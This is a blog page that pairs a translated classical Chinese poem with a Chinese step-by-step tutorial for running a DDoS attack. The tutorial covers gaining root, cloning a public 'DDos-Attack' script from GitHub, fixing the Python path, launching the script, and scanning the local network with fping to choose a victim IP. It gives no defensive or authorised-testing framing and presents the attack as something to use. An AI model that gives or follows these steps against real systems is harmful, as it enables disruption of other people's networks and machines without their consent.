banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

如何用利用进行下DDos攻击步骤如下

1.sudo -i 获取 root 权限

sudo -i

2. 输入

cd DDos-Attack

进入 DDos 目录

有的人在这里可能会遇到无法进入的问题

首先我们检查文字大小写有没有问题

如果无误那应该是没有配置好文件

只需输入

git clone https://github.com/Ha3MrX/DDos-Attack

即可 clone,一般能解决掉问题

当然问题有问多种,我在进行实操的时候它却提示无法克隆

我在网上找了许多解决方法,最终成功的是将 “https” 更换为 “git”,也就是说

git clone git://github.com/Ha3MrX/DDos-Attack

这样便可以完成配置。

3. 继续输入 chmod +x ddos-attack.py 设置权限

chmod +x ddos-attack.py

这条命令输入后并没有提示,所以大家确保输入正确就可以了

4.python ddos-attack.py 进入攻击界面

python ddos-attack.py

这里也有可能出现问题,如未找到 python 命令的提示(原提示句是什么我忘了,但就这个意思)

这就是 python 没有设置好的缘故 可能是因为你的 python 版本装太多了给终端整蒙了

这个时候先用 which python 查看 python

which python

不出意外应该会显示:/usr/bin/which : no python in (/usr/lib64/bin:/usr/lib64/sbin:/usr/lib/bin)

但不要急,这不是没有 python。我们直接按版本查找输入 which python2

which python2

会显示这样的文字,我们观察发现 python2.7 才是可识别的

/usr/bin/python2

$ ls -l /usr/bin/python2

-rwxr-xr-x. 1 root root /usr/bin/python2.7

所以我们只需要输入

$ ln -s /usr/bin/python2.7 /usr/bin/python

即可解决问题!

这个时候会出现这样的界面

Screenshot_3
就是进入成功了

在 IP 那栏输入目标 IP 即可进入攻击

但是我们要获取局域网内对方的 IP 需要输入

ifconfig

先确认自己的 IP 然后利用”fping -g 本机 IP 地址 / 24“来查看局域网内所有 IP

fping -g 本机 IP 地址 / 24

然后选择你的目标进行攻击即可。

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。